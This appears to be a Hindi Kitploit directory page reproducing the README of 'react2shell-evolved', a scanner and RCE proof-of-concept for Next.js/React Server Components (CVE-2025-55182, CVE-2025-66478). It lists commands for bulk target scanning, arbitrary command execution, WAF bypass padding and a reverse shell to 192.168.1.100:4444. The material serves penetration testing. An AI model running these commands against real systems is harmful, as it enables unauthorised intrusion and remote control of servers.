Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-evolved — एसेटनोट CVE-2025-55182 स्कैनर का एक उन्नत संस्करण | Kitploit
उपकरण/GitHubGitHub/guiimoraes/react2shell-evolved
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

एसेटनोट CVE-2025-55182 स्कैनर का एक उन्नत संस्करण

रिपॉजिटरी देखें
2158 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell Scanner

RSC/Next.js RCE के लिए उच्च-विश्वसनीयता डिटेक्शन

React Server Components और Next.js अनुप्रयोगों में Remote Code Execution (RCE) कमजोरियों का पता लगाने के लिए स्कैनर।

परिचय

React2Shell Scanner एक विशेष उपकरण है जो React Server Components (RSC) और Next.js का उपयोग करने वाले अनुप्रयोगों में दूरस्थ कोड निष्पादन (RCE) कमजोरियों की पहचान करने के लिए है। यह उपकरण निम्नलिखित CVEs से संबंधित कमजोरियों का पता लगाता है:

  • CVE-2025-55182
  • CVE-2025-66478

यह उपकरण साइड-चैनल डिटेक्शन और RCE प्रूफ-ऑफ-कॉन्सेप्ट का उपयोग करके उच्च-विश्वसनीयता जाँच करता है, जिसमें HTTP प्रतिक्रियाओं के स्वचालित पार्सिंग के माध्यम से निष्पादित कमांडों के गतिशील परिणाम निकालने की क्षमता होती है।

यह Assetnote Security Research Team द्वारा विकसित मूल स्कैनर का @imguimoraes द्वारा संपादित संस्करण है। मूल RCE PoC @maple3142 द्वारा बनाया गया था।

विशेषताएँ

  • साइड-चैनल और PoC RCE का उपयोग करके उच्च-विश्वसनीयता डिटेक्शन
  • बल्क स्कैन के लिए मल्टी-थ्रेडेड निष्पादन
  • निष्पादित कमांडों के परिणामों की गतिशील निकासी (हेडर और प्रतिक्रिया बॉडी का स्वचालित पार्सिंग)
  • कॉन्फ़िगर करने योग्य यादृच्छिक डेटा के साथ WAF बायपास
  • Windows (PowerShell) और Linux/Unix (shell) के लिए समर्थन
  • बाद के विश्लेषण के लिए संरचित JSON आउटपुट
  • रिडायरेक्ट का स्वचालित अनुसरण
  • प्रोग्रेस बार और रंगीन आउटपुट के साथ इंटरफ़ेस

स्थापना

आवश्यकताएँ

  • Python 3.8 या उच्चतर
  • pip (Python पैकेज प्रबंधक)
  • निर्भरताओं की स्थापना

    root@kitploit:~
    pip install requests tqdm
    

    या requirements.txt फ़ाइल का उपयोग करके:

    root@kitploit:~
    pip install -r requirements.txt
    

    उपयोग

    मूल सिंटैक्स

    root@kitploit:~
    python scanner.py [-u URL | -l FILE] [opções]
    

    एकल URL जाँचें

    root@kitploit:~
    python scanner.py -u https://example.com
    

    एकाधिक URLs जाँचें

    root@kitploit:~
    python scanner.py -l hosts.txt
    

    कमांड लाइन विकल्प

    इनपुट विकल्प (उनमें से एक अनिवार्य)

    विकल्पविवरण
    -u, --url URLजाँचने के लिए एकल URL या होस्ट
    -l, --list FILEहोस्टों की सूची वाली फ़ाइल (प्रति पंक्ति एक)

    निष्पादन विकल्प

    विकल्पविवरण
    -t, --threads Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
    --timeout SECONDSसेकंड में अनुरोधों का टाइमआउट (डिफ़ॉल्ट: 10)
    -k, --insecureSSL प्रमाणपत्र सत्यापन अक्षम करें (डिफ़ॉल्ट रूप से सक्षम)

    आउटपुट विकल्प

    विकल्पविवरण
    -o, --output FILEJSON प्रारूप में परिणामों के लिए आउटपुट फ़ाइल
    --all-resultsसभी परिणाम फ़ाइल में सहेजें, केवल कमजोर वाले नहीं
    -v, --verboseविस्तृत आउटपुट (विश्लेषण के लिए प्रतिक्रिया स्निपेट दिखाता है)
    -q, --quietशांत मोड (केवल कमजोर होस्ट दिखाता है)
    --no-colorरंगीन आउटपुट अक्षम करें

    हेडर विकल्प

    विकल्पविवरण
    -H, --header "Key: Value"कस्टम HTTP हेडर जोड़ें (कई बार उपयोग किया जा सकता है)

    एक्सप्लॉइट विकल्प

    विकल्पविवरण
    --safe-checkPoC RCE के बजाय सुरक्षित साइड-चैनल डिटेक्शन का उपयोग करें (कोड निष्पादित नहीं करता)
    --windowsUnix shell के बजाय PowerShell पेलोड का उपयोग करें (Windows वातावरण के लिए)
    --waf-bypassWAF बायपास के लिए पेलोड में यादृच्छिक डेटा जोड़ें (डिफ़ॉल्ट: 128KB)
    --waf-bypass-size KBWAF बायपास के लिए यादृच्छिक डेटा का आकार KB में (डिफ़ॉल्ट: 128)
    --payload COMMANDRCE में निष्पादित करने के लिए कस्टम कमांड (डिफ़ॉल्ट: echo $((41*271)))
    --reverse-shell IP:PORTनिर्दिष्ट IP:PORT के लिए reverse shell कनेक्शन बनाएं

    उपयोग के उदाहरण

    उदाहरण 1: एक होस्ट का बुनियादी स्कैन

    root@kitploit:~
    python scanner.py -u https://target.com
    

    उदाहरण 2: एकाधिक थ्रेड्स के साथ बल्क स्कैन

    root@kitploit:~
    python scanner.py -l targets.txt -t 50 --timeout 15
    

    उदाहरण 3: JSON आउटपुट के साथ स्कैन

    root@kitploit:~
    python scanner.py -l targets.txt -o results.json --all-results
    

    उदाहरण 4: कस्टम हेडर के साथ स्कैन

    root@kitploit:~
    python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"
    

    उदाहरण 5: कस्टम पेलोड के साथ स्कैन

    root@kitploit:~
    python scanner.py -u https://target.com --payload "whoami"
    

    उदाहरण 6: WAF बायपास के साथ स्कैन

    root@kitploit:~
    python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256
    

    उदाहरण 7: Windows वातावरण में स्कैन

    root@kitploit:~
    python scanner.py -u https://target.com --windows --payload "whoami"
    

    उदाहरण 8: सुरक्षित जांच के साथ स्कैन (गैर-आक्रामक)

    root@kitploit:~
    python scanner.py -l targets.txt --safe-check
    

    उदाहरण 9: पूर्ण विस्तृत स्कैन

    root@kitploit:~
    python scanner.py -l targets.txt -v --all-results -o full_scan.json
    

    उदाहरण 10: रिवर्स शेल स्थापित करना

    root@kitploit:~
    python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444
    

    आउटपुट प्रारूप

    टर्मिनल आउटपुट

    स्कैनर स्थिति दर्शाने वाले रंग कोड के साथ परिणाम प्रदर्शित करता है:

    • [VULNERABLE] - कमजोर होस्ट (लाल)
    • [NOT VULNERABLE] - गैर-कमजोर होस्ट (हरा)
    • [ERROR] - जांच के दौरान त्रुटि (पीला)

    कमजोर होस्टों के लिए, X-Action-Redirect हेडर या प्रतिक्रिया बॉडी से स्वचालित निकासी के माध्यम से उपलब्ध होने पर निष्पादित कमांड का परिणाम प्रदर्शित किया जाता है।

    JSON प्रारूप

    जब -o विकल्प का उपयोग किया जाता है, तो आउटपुट निम्नलिखित संरचना के साथ JSON प्रारूप में सहेजा जाता है:

    root@kitploit:~
    {
      "scan_time": "2025-01-XXT00:00:00.000000Z",
      "total_results": 10,
      "results": [
        {
          "host": "https://target.com",
          "vulnerable": true,
          "status_code": 307,
          "final_url": "https://target.com/",
          "command_result": "11111",
          "timestamp": "2025-01-XXT00:00:00.000000Z",
          "request": "POST / HTTP/1.1\r\n...",
          "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
          "error": null
        }
      ]
    }
    

    परिणाम के फ़ील्ड:

    • vulnerable: true यदि कमजोर है, false यदि कमजोर नहीं है, null यदि त्रुटि हुई
    • command_result: प्रतिक्रिया से निकाला गया निष्पादित कमांड का परिणाम (जब उपलब्ध हो)
    • final_url: परीक्षण किया गया अंतिम URL (रिडायरेक्ट का अनुसरण सक्षम होने पर)
    • status_code: प्रतिक्रिया का HTTP कोड
    • request: भेजा गया पूर्ण HTTP अनुरोध
    • response: प्राप्त HTTP प्रतिक्रिया (पहले 2000 वर्ण)
    • error: त्रुटि संदेश यदि कोई हो
    • timestamp: जांच का UTC टाइमस्टैम्प

    तकनीकी विशेषताएँ

    डिटेक्शन विधियाँ

    स्कैनर दो डिटेक्शन विधियाँ प्रदान करता है:

    1. Safe Check (--safe-check): गैर-आक्रामक साइड-चैनल डिटेक्शन जो कोड निष्पादित किए बिना प्रतिक्रिया में त्रुटि पैटर्न की जाँच करता है। बिना प्रभाव के प्रारंभिक स्कैन के लिए उपयोगी।

    2. RCE PoC: परिणामों की गतिशील निकासी के साथ वास्तविक दूरस्थ कोड निष्पादन। सिस्टम कमांड निष्पादित करने के लिए Node.js child_process-आधारित पेलोड का उपयोग करता है।

    परिणामों की निकासी

    स्कैनर निष्पादित कमांडों के परिणाम निकालने के लिए HTTP प्रतिक्रियाओं का स्वचालित पार्सिंग करता है:

    • X-Action-Redirect हेडर की निकासी (प्रारूप: NEXT_REDIRECT;push;/login?a=<result>;307;)
    • प्रतिक्रिया बॉडी की निकासी (प्रारूप: E{"digest":"<result>"} या 1:E{"digest":"<result>"})
    • --payload पैरामीटर के माध्यम से किसी भी कस्टम कमांड/पेलोड के साथ काम करता है

    निकासी गतिशील रूप से की जाती है, निश्चित मानों पर निर्भर नहीं होती, जिससे किसी भी कमांड के निष्पादन को मान्य करना संभव होता है।

    WAF Bypass

    जब --waf-bypass विकल्प का उपयोग किया जाता है:

    • multipart/form-data पेलोड की शुरुआत में यादृच्छिक डेटा (जंक डेटा) जोड़ता है
    • --waf-bypass-size के माध्यम से कॉन्फ़िगर करने योग्य आकार (डिफ़ॉल्ट: 128KB)
    • अनुरोध बॉडी की सामग्री का निरीक्षण करने वाले WAF फ़िल्टर को बायपास करने के लिए उपयोगी
    • WAF बायपास सक्रिय होने पर टाइमआउट स्वचालित रूप से 20 सेकंड तक बढ़ा दिया जाता है

    कस्टम पेलोड

    --payload पैरामीटर निष्पादित किए जाने वाले किसी भी कमांड को निर्दिष्ट करने की अनुमति देता है:

    • डिफ़ॉल्ट: echo $((41*271)) (परिणाम: 11111)
    • Windows: जब --windows सक्रिय हो तो PowerShell कमांड का उपयोग करें
    • Linux/Unix: मानक shell कमांड का उपयोग करें

    कमांड का परिणाम स्वचालित रूप से निकाला और प्रदर्शित किया जाता है, चाहे लौटाया गया मान कुछ भी हो।

    Reverse Shell

    --reverse-shell विकल्प reverse shell कनेक्शन स्थापित करने की अनुमति देता है:

    • प्रारूप: IP:PORT (उदाहरण: 192.168.1.100:4444)
    • Node.js net और child_process मॉड्यूल का उपयोग करता है
    • Windows के लिए: powershell.exe स्पॉन करता है
    • Linux/Unix के लिए: /bin/sh स्पॉन करता है

    कानूनी और नैतिक चेतावनियाँ

    यह उपकरण विशेष रूप से शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है।

    • केवल उन्हीं सिस्टम पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट और लिखित अनुमति है
    • इस उपकरण का अनधिकृत उपयोग अवैध है और आपराधिक दायित्व का कारण बन सकता है
    • डेवलपर्स इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं
    • पेनेट्रेशन परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें
    • अपने क्षेत्राधिकार में लागू कानूनों और विनियमों का सम्मान करें

    क्रेडिट

    मूल एक्सप्लॉइट

    मूल RCE एक्सप्लॉइट @maple3142 द्वारा बनाया गया था।

    मूल स्कैनर

    मूल स्कैनर Assetnote Security Research Team द्वारा विकसित किया गया था:

    • रिपॉजिटरी: https://github.com/assetnote/react2shell-scanner/
    • वेबसाइट: https://www.assetnote.io/

    यह संस्करण

    यह संपादित संस्करण अतिरिक्त सुधारों के साथ मूल स्कैनर की कार्यक्षमताओं को बनाए रखता है:

    • कमांड परिणामों की गतिशील निकासी (प्रतिक्रियाओं का स्वचालित पार्सिंग)
    • परिणाम निकासी के साथ कस्टम कमांड के लिए समर्थन
    • Vercel Bypass को हटाया गया (??/??/2025 में पैच किया गया)
    • Reverse Shell प्रणाली (क्रैश-फ्रेंडली)

    द्वारा संपादित: guiimoraes

    संबंधित CVEs

    • CVE-2025-55182
    • CVE-2025-66478

    यदि आपको बग मिलें या सुधार के सुझाव हों, तो कृपया रिपॉजिटरी में एक issue खोलें और समस्या का विस्तृत विवरण दें।

    टूल डाउनलोड करें